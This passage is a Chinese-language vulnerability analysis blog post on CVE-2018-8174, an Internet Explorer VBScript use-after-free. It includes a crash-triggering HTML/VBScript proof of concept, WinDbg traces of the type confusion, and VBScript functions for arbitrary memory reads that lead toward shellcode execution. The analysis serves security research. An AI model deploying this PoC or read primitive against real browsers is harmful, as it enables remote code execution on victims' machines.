CVE-2018-8174漏洞复现调试笔记

编程语言 2018-09-10 12:15:47 阅读次数: 0
版权声明:本人的作品仅供研究目的,如果读者利用本人的作品从事其他行为,与本人无关 https://blog.csdn.net/oShuangYue12/article/details/82557119

1.分析导致crash的漏洞原理poc

<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
<body>
<script language="vbscript">
Dim array()
Dim array2(1)
Class MyClass    
    Private Sub Class_Terminate
           Set array2(0)=array(1)
           array(1)=1
    End Sub
End Class
Redim array(1)  
Set array(1)=New MyClass
Erase array
array2(0)=0
</script>
</body>
</html>

具体原理我的理解是MyClass赋值给array(1)之后擦除时,触发了Class_Terminate,array(1)又被赋值给array2(0),导致array2(0)仍然维持New MyClass引用变成悬挂指针,最后再次把array擦除,导致触发UAF崩溃
逆向结果

struct __declspec(align(4)) VBScriptClass
{
  unsigned int NameVTbl;
  VBScriptClass+0x8字段为RefCount
  unsigned int RefCount;
  unsigned int f3;
  unsigned int f4;
  unsigned int ThreadId;
  unsigned int IPinnablVtbl;
  unsigned int CPinVtbl;
  unsigned int f8;
  unsigned int f9;
  unsigned int f10;
  unsigned int f11;
  unsigned int f12;
  unsigned int CheckFlag;
  unsigned int f14;
  unsigned int f15;
  unsigned int f16;
  unsigned int f17;
};
//VBScriptClass的释放函数
signed __int32 __stdcall VBScriptClass::Release(CMyVBScriptClass *this)
{
  volatile signed __int32 *RefCountRef; // esi
  signed __int32 result; // eax
  unsigned int CheckFlagRef; // edi
  int v4; // [esp+0h] [ebp-10h]
  int resultRef; // [esp+Ch] [ebp-4h]

  RefCountRef = (volatile signed __int32 *)&this->RefCount;
  //在释放时减少引用计数RefCount
  result = _InterlockedDecrement((volatile signed __int32 *)&this->RefCount);
  if ( !result )
  {
    // 当RefCount小于1时执行销毁函数VBScriptClass::TerminateClass
    CheckFlagRef = this->CheckFlag;
    this->CheckFlag = 1;
    _InterlockedExchangeAdd(RefCountRef, 1u);
    VBScriptClass::TerminateClass((VBScriptClass *)this, 1);
    result = _InterlockedDecrement(RefCountRef);
    resultRef = result;
    this->CheckFlag = CheckFlagRef;
    // 当RefCount小于1ren仍然小于1 抛出异常
    if ( !result )
    {
      if ( CheckFlagRef )
        VBScriptClass_NestedRelease_Fatal_Error((unsigned int)this);
      (*(void (__thiscall **)(CMyVBScriptClass *))(this->NameVTbl + 100))(this);
      if ( &v4 != &v4 )
        __fastfail(4u);
      VBScriptClass::CheckDelete((VBScriptClass *)this);
      result = resultRef;
    }
  }
  return result;
}

调试过程
可以使用命令gflags /p /enable iexplore.exe /ful查看下断点在
bp vbscript!VBScriptClass::VBScriptClass
bp vbscript!VAR::Clear “dt ole32!VARIANTARG @ecx; dps poi( @ecx+0x008)”
调试输出:

0:007> bp vbscript!VBScriptClass::VBScriptClass
0:007> g
Breakpoint 0 hit
//这里看到的VBScriptClass的实例对象为ecx=0e4b5fd0
eax=0e4b5fd0 ebx=049fbafc ecx=0e4b5fd0 edx=00000000 esi=0e48df95 edi=0e46af88
eip=6c339432 esp=049fb9e8 ebp=049fb9fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
vbscript!VBScriptClass::VBScriptClass:
6c339432 8bff            mov     edi,edi
0:007> dps 0e4b5fd0
0e4b5fd0  6c31206c vbscript!VBScriptClass::`vftable'
//vbscript!VBScriptClass->RefCount引用计数为1
0e4b5fd4  00000001
0e4b5fd8  00000000
0e4b5fdc  0e46af88
0e4b5fe0  00000f00
0e4b5fe4  00000000
0e4b5fe8  00000000
0e4b5fec  00000000
0e4b5ff0  00000000
0e4b5ff4  0c694fe4
0e4b5ff8  00000000
0e4b5ffc  00000000
0:007> g
(ba4.f00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e4b5fd0 ebx=6c870e50 ecx=00000009 edx=00000009 esi=0bc28fe0 edi=00000009
eip=76c24971 esp=049fbd30 ebp=049fbd38 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
OLEAUT32!VariantClear+0xb3:
//这里导致UAF的指针正好是vbscript!VBScriptClass的指针即之前的ecx=0e4b5fd0
76c24971 8b08            mov     ecx,dword ptr [eax]  ds:0023:0e4b5fd0=????????
0:007> !heap -p -a eax
    address 0e4b5fd0 found in
    _DPH_HEAP_ROOT @ 1941000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    ba13784:          e4b5000             2000
    72cc90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    773566ac ntdll!RtlDebugFreeHeap+0x0000002f
    7731a13e ntdll!RtlpFreeHeap+0x0000005d
    772e65a6 ntdll!RtlFreeHeap+0x00000142
    756698cd msvcrt!free+0x000000cd
    6c32717a vbscript!VBScriptClass::`scalar deleting destructor'+0x0000001a
    6c3271fd vbscript!VBScriptClass::Release+0x00000053
    76c24977 OLEAUT32!VariantClear+0x000000b9
    76c3e325 OLEAUT32!ReleaseResources+0x000000a3
    76c3dfb3 OLEAUT32!_SafeArrayDestroyData+0x00000048
    76c45d2d OLEAUT32!SafeArrayDestroyData+0x0000000f
    76c45d13 OLEAUT32!Thunk_SafeArrayDestroyData+0x00000039
    6c3752d0 vbscript!VbsErase+0x00000050
    6c314787 vbscript!StaticEntryPoint::Call+0x0000002f
    6c3157cb vbscript!CScriptRuntime::RunNoEH+0x00001d74
    6c31526e vbscript!CScriptRuntime::Run+0x000000c3
    6c31518b vbscript!CScriptEntryPoint::Call+0x0000010b
    6c3159bd vbscript!CSession::Execute+0x00000156
    6c315c6b vbscript!COleScript::ExecutePendingScripts+0x0000014f
    6c338ed8 vbscript!COleScript::ParseScriptTextCore+0x0000023e
    6c31c1d9 vbscript!COleScript::ParseScriptText+0x00000029
    663458a5 MSHTML!CActiveScriptHolder::ParseScriptText+0x00000051
    666525ae MSHTML!CScriptCollection::ParseScriptText+0x00000193
    66346669 MSHTML!CScriptData::CommitCode+0x00000370
    66346204 MSHTML!CScriptData::Execute+0x000002a9
    66346ca4 MSHTML!CHtmScriptParseCtx::Execute+0x00000130
    66152c60 MSHTML!CHtmParseBase::Execute+0x00000196
    66086343 MSHTML!CHtmPost::Broadcast+0x00000153
    660860f8 MSHTML!CHtmPost::Exec+0x000005d9
    6610fc08 MSHTML!CHtmPost::Run+0x0000003d
    6610fb6e MSHTML!PostManExecute+0x00000061
    6611a826 MSHTML!PostManResume+0x0000007b

2.分析完整poc

先创建11空的TEMPVALIl的VBScriptClass填充内存,再填充12个MYClASS2,再用6个cla1类同时擦除的arraya,构造6个arrayb悬挂指针,最后构造1个mycls2=MYClASS2,一共7个MYClASS2的内存结构
最后这个MYClASS2有个SetProp方法,可以把MYClASS2类中Mem成员赋值成Confusion类,并触发Confusion类下P属性,其中再次清空6个arrayb悬挂指针,然后构造6个MYClASS1赋值给6个arrayb悬挂指针,MYClASS2和MYClASS1类中具有相同偏移量的Mem成员,这里MYClASS1类mem是预先定义好的FakeArray数组(之前是BSTR),
由于6个arrayb悬挂指针后有1个MYClASS2,6个arrayb悬挂指针是6个MYClASS1,那么最后P属性的返回值必定在MYClASS1和MYClASS2的错位处混肴,在下面的调试过程中证明MYClASS2指针与MYClASS1重叠即指针地址相同,利用P的值精心构造内存结构将MYClASS1类mem类型从BSTR混肴成Array类型,从而实现任意内存读取
调试过程
仍然以VBScriptClass构造函数为断点
bp vbscript!VBScriptClass::VBScriptClass “dps @ecx”
因为vbscript断点不好下,所有我在poc中加入alert以辅助定位至关键的VBScriptClass构造函数,具体位置见我修改的poc源码,在文章底部
调试输出:

0:016> bp vbscript!VBScriptClass::VBScriptClass "dps @ecx"
0:016> g
005ff040  6c1affff vbscript!Parser::ParseSource+0x1
005ff044  00000000
005ff048  00000000
005ff04c  00000000
005ff050  00000ce4
005ff054  00000000
005ff058  00000000
//alert one 第一次断下MYClASS2实例对应的ecx=005ff040
eax=005ff040 ebx=02d5b53c ecx=005ff040 edx=00466538 esi=00621489 edi=005b1320
eip=6c1c9432 esp=02d5b428 ebp=02d5b43c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
vbscript!VBScriptClass::VBScriptClass:
6c1c9432 8bff            mov     edi,edi
0:007> g
(50c.d08): Break instruction exception - code 80000003 (first chance)
eax=7ffd9000 ebx=00000000 ecx=00000000 edx=77d8f1d3 esi=00000000 edi=00000000
eip=77d24108 esp=0981fcec ebp=0981fd18 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
77d24108 cc              int     3
0:005> g
006115f0  00610009
006115f4  00612074
006115f8  6c3621c4 jscript9!JsVarToExtension+0x4ef4
006115fc  00000000
00611600  03d00000
00611604  00000020
00611608  00000000
//alert two 第二次断下MYClASS2实例对应的ecx=006115f0
eax=006115f0 ebx=02d5b53c ecx=006115f0 edx=00466538 esi=00621489 edi=005b1320
eip=6c1c9432 esp=02d5b428 ebp=02d5b43c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
vbscript!VBScriptClass::VBScriptClass:
6c1c9432 8bff            mov     edi,edi
0:007> g
(50c.398): Break instruction exception - code 80000003 (first chance)
eax=7ffda000 ebx=00000000 ecx=00000000 edx=77d8f1d3 esi=00000000 edi=00000000
eip=77d24108 esp=042efa80 ebp=042efaac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
77d24108 cc              int     3
0:004> dc 005ff040
//指向MYClASS2->mem的结构地址=0060cc10
005ff040  6c1a206c 00000001 0060cc10 005b1320  l .l......`. .[.
005ff050  00000ce4 00000000 00000000 00000000  ................
005ff060  00000000 02790c64 006115f0 005ff008  ....d.y...a..._.
005ff070  00000000 00000000 2d933c1c 08087c46  .........<.-F|..
005ff080  0046f318 005a60f0 0000000d f0e0d0c0  ..F..`Z.........
005ff090  37441a8a 8c000000 6c36232c 02b56000  ..D7....,#6l.`..
005ff0a0  005f6b60 00000003 00000006 00000001  `k_.............
005ff0b0  00000013 02b575b0 02b5c000 00000000  .....u..........
0:004> dc 0060cc10
0060cc10  0060f820 000000ac 00000100 00000100   .`.............
0060cc20  00004000 0060f824 0060f8b8 005bd580  .@..$.`...`...[.
0060cc30  0000000f 00000003 00000040 00000003  ........@.......
0060cc40  00000014 0060cc48 0060f824 0060f858  ....H.`.$.`.X.`.
//结构地址中根据偏移量找出指向MYClASS2->mem的指针,错位前=0060f898
0060cc50  0060f898 00000000 000010be 00001190  ..`.............
0060cc60  00000000 0060c864 0060cd40 00000001  ....d.`.@.`.....
0060cc70  00000000 00001193 00001194 006093b8  ..............`.
0060cc80  00000001 00000000 00001195 0000119e  ................
0:004> dc 0060f898
0060f898  00000000 006048b8 00000022 00000000  .....H`.".......
0060f8a8  00000000 00001b36 0000822f 00000006  ....6.../.......
0060f8b8  00000000 00000000 00000003 00001b01  ................
0060f8c8  0065006d 0000006d 0060f840 0060f97c  m.e.m...@.`.|.`.
0060f8d8  00000001 00000000 00001b39 00001b42  ........9...B...
0060f8e8  00609578 00000001 00000000 00001b43  x.`.........C...
0060f8f8  00001b4c 00609578 00000001 00000000  L...x.`.........
0060f908  00001b4e 00001b5b 00609b90 00000001  N...[.....`.....
0:004> dc 0060f88c
0060f88c  00500074 006f0072 00000070 00000000  t.P.r.o.p.......
0060f89c  006048b8 00000022 00000000 00000000  .H`."...........
0060f8ac  00001b36 0000822f 00000006 00000000  6.../...........
0060f8bc  00000000 00000003 00001b01 0065006d  ............m.e.
0060f8cc  0000006d 0060f840 0060f97c 00000001  m...@.`.|.`.....
0060f8dc  00000000 00001b39 00001b42 00609578  ....9...B...x.`.
0060f8ec  00000001 00000000 00001b43 00001b4c  ........C...L...
0060f8fc  00609578 00000001 00000000 00001b4e  x.`.........N...
0:004>  dc 0060f898
0060f898  00000000 006048b8 00000022 00000000  .....H`.".......
0060f8a8  00000000 00001b36 0000822f 00000006  ....6.../.......
0060f8b8  00000000 00000000 00000003 00001b01  ................
0060f8c8  0065006d 0000006d 0060f840 0060f97c  m.e.m...@.`.|.`.
0060f8d8  00000001 00000000 00001b39 00001b42  ........9...B...
0060f8e8  00609578 00000001 00000000 00001b43  x.`.........C...
0060f8f8  00001b4c 00609578 00000001 00000000  L...x.`.........
0060f908  00001b4e 00001b5b 00609b90 00000001  N...[.....`.....
0:004> g
005ff040  6c1affff vbscript!Parser::ParseSource+0x1
005ff044  00000000
005ff048  00000000
005ff04c  00000000
005ff050  00000ce4
005ff054  00000000
005ff058  00000000
005ff05c  00000000
005ff060  00000000
005ff064  02790c64
005ff068  00000000
005ff06c  00000000
005ff070  00000000
005ff074  00000000
005ff078  2d933c1c
005ff07c  08087c46
005ff080  0046f318
005ff084  005a60f0
005ff088  0000000d
005ff08c  f0e0d0c0
005ff090  37441a8a
005ff094  8c000000
005ff098  6c36232c jscript9!JsVarToExtension+0x505c
005ff09c  02b56000
005ff0a0  005f6b60
005ff0a4  00000003
005ff0a8  00000006
005ff0ac  00000001
005ff0b0  00000013
005ff0b4  02b575b0
005ff0b8  02b5c000
005ff0bc  00000000
//alert work1 第三次断下MYClASS1实例对应的ecx=005ff040,与MYClASS2实例指针重叠在此证明
eax=005ff040 ebx=02d5a804 ecx=005ff040 edx=00466538 esi=006213ad edi=005b1320
eip=6c1c9432 esp=02d5a6f0 ebp=02d5a704 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
vbscript!VBScriptClass::VBScriptClass:
6c1c9432 8bff            mov     edi,edi
0:007> g
006115f0  6c1a0010 vbscript!__xc_a <PERF> (vbscript+0x10)
006115f4  00000000
006115f8  00000000
006115fc  00000000
00611600  00000ce4
00611604  00000000
00611608  00000000
0061160c  00000000
00611610  00000000
00611614  02790c8c
00611618  00000000
0061161c  00000000
00611620  3743c17c
00611624  8c0013d8
00611628  6c1b33b4 vbscript!DexCaller::`vftable'
0061162c  6c1c8890 vbscript!DexCaller::`vftable'
00611630  6c1c8880 vbscript!DexCaller::`vftable'
00611634  00000002
00611638  005b1320
0061163c  005fea90
00611640  02794fb0
00611644  02d5b460
00611648  03d03000
0061164c  00000000
00611650  00000000
00611654  00000000
00611658  3743c173
0061165c  8000211a
00611660  6c1b0017 vbscript!COleScript::AddRef+0x7
00611664  6c1c8890 vbscript!DexCaller::`vftable'
00611668  6c1c8880 vbscript!DexCaller::`vftable'
0061166c  00000000
//alert work2 第四次断下MYClASS1实例对应的ecx=006115f0,同理与MYClASS2实例指针重叠在此证明
eax=006115f0 ebx=02d5a804 ecx=006115f0 edx=00466538 esi=006213ad edi=005b1320
eip=6c1c9432 esp=02d5a6f0 ebp=02d5a704 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
vbscript!VBScriptClass::VBScriptClass:
6c1c9432 8bff            mov     edi,edi
0:007> g
(50c.324): Break instruction exception - code 80000003 (first chance)
eax=7ffd9000 ebx=00000000 ecx=00000000 edx=77d8f1d3 esi=00000000 edi=00000000
eip=77d24108 esp=0948f9c8 ebp=0948f9f4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
77d24108 cc              int     3
0:005> dc 005ff040
//再次找出指向MYClASS2->mem也就是MYClASS1->mem的结构地址=0060cc10
005ff040  6c1a206c 00000001 0060cc10 005b1320  l .l......`. .[.
005ff050  00000ce4 00000000 00000000 00000000  ................
005ff060  00000000 027899dc 006115f0 005ff008  ......x...a..._.
005ff070  00000000 00000000 2d933c1c 08087c46  .........<.-F|..
005ff080  0046f318 005a60f0 0000000d f0e0d0c0  ..F..`Z.........
005ff090  37441a8a 8c000000 6c36232c 02b56000  ..D7....,#6l.`..
005ff0a0  005f6b60 00000003 00000006 00000001  `k_.............
005ff0b0  00000013 02b575b0 02b5c000 00000000  .....u..........
0:005> dps 005ff040
005ff040  6c1a206c vbscript!VBScriptClass::`vftable'
005ff044  00000001
005ff048  0060cc10
005ff04c  005b1320
005ff050  00000ce4
005ff054  00000000
005ff058  00000000
005ff05c  00000000
005ff060  00000000
0:005> dc 0060cc10
0060cc10  0060f820 000000b8 00000100 00000100   .`.............
0060cc20  00004000 0060f824 0060f8c4 005bd580  .@..$.`...`...[.
0060cc30  0000000f 00000003 00000040 00000003  ........@.......
0060cc40  00000014 0060cc48 0060f824 0060f86c  ....H.`.$.`.l.`.
//结构地址中根据偏移量找出指向MYClASS2->mem也就是MYClASS1->mem的指针,错位前=0060f898,错位后=0060f8a4
0060cc50  0060f8a4 00000000 000010be 00001190  ..`.............
0060cc60  00000000 0060c864 0060cd40 00000001  ....d.`.@.`.....
0060cc70  00000000 00001193 00001194 006093b8  ..............`.
0060cc80  00000001 00000000 00001195 0000119e  ................
//错位后=0060f8a4-0060f898正好=0c大小从错位
0:005> dc 0060f8a4
0060f8a4  0000200c 0060a180 02789324 00000000  . ....`.$.x.....
0060f8b4  00000000 00000000 0000822f 00000006  ......../.......
0060f8c4  00000000 00000000 00000003 0060f840  ............@.`.
0060f8d4  0065006d 0000006d 00000000 00001b39  m.e.m.......9...
0060f8e4  00001b42 00609578 00000001 00000000  B...x.`.........
0060f8f4  00001b43 00001b4c 00609578 00000001  C...L...x.`.....
0060f904  00000000 00001b4e 00001b5b 00609b90  ....N...[.....`.
0060f914  00000001 00000000 00001b5c 00001b6b  ........\...k...
0:005> dc  0060f898
//错位地址已被Confusion类的P属性覆盖成“00000005 00000000 00000000 0000200c”实现VARIANT类型混淆,其中“00000005”将BSTR混淆为VARIANT|ARRAY
0060f898  00000005 00604ddc 00000000 0000200c  .....M`...... ..
0060f8a8  0060a180 02789324 00000000 00000000  ..`.$.x.........
0060f8b8  00000000 0000822f 00000006 00000000  ..../...........
0060f8c8  00000000 00000003 0060f840 0065006d  ........@.`.m.e.
0060f8d8  0000006d 00000000 00001b39 00001b42  m.......9...B...
0060f8e8  00609578 00000001 00000000 00001b43  x.`.........C...
0060f8f8  00001b4c 00609578 00000001 00000000  L...x.`.........
0060f908  00001b4e 00001b5b 00609b90 00000001  N...[.....`.....
0:005> dps 006115f0 
006115f0  6c1a206c vbscript!VBScriptClass::`vftable'
006115f4  00000001
//同理查看指向外一个MYClASS2->mem的结构地址=0060ce50
006115f8  0060ce50
006115fc  005b1320
00611600  00000ce4
00611604  00000000
00611608  00000000
0061160c  00000000
00611610  00000000
0:005> dc  0060ce50
//另外一个指向MYClASS2->mem也就是MYClASS1->mem的结构地址=0060fd04
0060ce50  0060fc80 000000b8 00000100 00000100  ..`.............
0060ce60  00004000 0060fc84 0060fd24 005bd610  .@....`.$.`...[.
0060ce70  0000000f 00000003 00000040 00000003  ........@.......
0060ce80  00000014 0060ce88 0060fc84 0060fccc  ......`...`...`.
0060ce90  0060fd04 fffefffe fffefffe fffefffe  ..`.............
0060cea0  fffefffe fffefffe fffefffe fffefffe  ................
0060ceb0  fffefffe 00000000 00000000 00000000  ................
0060cec0  00000000 00000000 00000000 00000000  ................
0:005> dc 0060fd04
//另外一个错位地址已被Confusion类的P属性覆盖成“00000003 00000000 00000000 00000000”实现VARIANT类型混淆,其中“00000003”将BSTR混淆为VARIANT|LONG
0060fd04  00000003 0060a180 02790c3c 00000000  ......`.<.y.....
0060fd14  00000000 00000000 0000822f 00000006  ......../.......
0060fd24  00000000 00000000 00000003 00010080  ................
0060fd34  0065006d 0000006d aaaaaaaa aaaaaaaa  m.e.m...........
0060fd44  aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa  ................
0060fd54  00000000 00000000 00000000 00000000  ................
0060fd64  00000000 00000000 00000000 00000000  ................
0060fd74  00000000 00000000 00000000 00000000  ................

3.分析最后漏洞poc利用方法

读取地址地址代码
Function GetUint32(addr)
    Dim value
    ArrTEMPGLOBAL.mem(MyVALUE+8)=addr+4
    ArrTEMPGLOBAL.mem(MyVALUE)=8        'type string
    GetUint32=GetAddrValue
End Function
Function GetAddrValue(addr)
    GetAddrValue=Lenb(ArrTEMPGLOBAL.mem(MyVALUE+8)) 
End Function
//tagSAFEARRAY结构
#pragma pack(push, 8)
struct tagSAFEARRAY
{
  USHORT cDims;
  USHORT fFeatures;
  ULONG cbElements;
  ULONG cLocks;
  PVOID pvData;
  SAFEARRAYBOUND rgsabound[1];
};
#pragma pack(pop)

当实现混肴后,可以通过MYClASS2->mem也就是MYClASS1->mem之泄露的地址mem,因为对于VARIANT类型类型对于的SAFEARRAY结构首部有2个USHORT,加起来长度是4,然后将mem赋值成8即string类型,这个string类型长度->cbElements的指针地址赋值为addr+4,这样再通过GetAddrValue获取这个string的长度就等于读取addr的指针指向的值从而实现任意地址读取,最后获取vbsscript.dll等一系列dll导出函数的基址后,通过清空arrayb悬挂指针指针时触发vbscript!VAR::Clear导致shellcode执行

猜你喜欢

转载自blog.csdn.net/oShuangYue12/article/details/82557119
今日推荐
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
周排行
Family Tree 题解
BZOJ 1093 最大半连通子图 SCC + DP
幂等处理
Spring----学习(2)----XML 配置Bean 自动装配
SQL Server 远程更新目标表数据
HIbernate3.6 环境搭建
特殊符号正则表达式
【Linux】第一章 进程的理解
843. n-皇后问题(dfs+输出各种情况)
空间数据库2
每日归档
更多
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022